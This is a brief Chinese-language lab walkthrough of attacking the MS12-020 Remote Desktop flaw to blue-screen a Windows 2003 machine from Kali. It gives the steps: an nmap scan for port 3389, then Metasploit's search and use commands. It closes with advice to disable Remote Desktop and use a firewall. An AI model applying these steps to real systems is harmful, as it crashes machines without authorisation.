MS12-020漏洞利用—蓝屏攻击

两台靶机：kali、win2003
被攻击者win2003 ip：192. 168.179.132
原理：利用操作系统内核的缺陷，发送大量数据包，则这个漏洞可能造成拒绝服务攻击或允许远程执行代码
前提：对方开启3389端口

1、两者都在同一内网，采用NAT连接方式。开启win2003开启远程桌面


2、扫描目标机，发现开放了3389，可以继续下一步操作了
nmap -sV /nmap -sT 都可以扫描

3、开始渗透
渗透测试系统中，在终端输入msfconsole进入msf终端

msfconsole

接着在msf终端中使用search功能搜索ms12-020，发现有两个可用模块，使用use命令选定要利用的模块

search ms12_020
use 0 show
options

查看需要填写的参数，这里需要填写靶机IP地址

蓝屏攻击成功,受害者

所以安全起见，记得关闭远程桌面和设置好防火墙！！！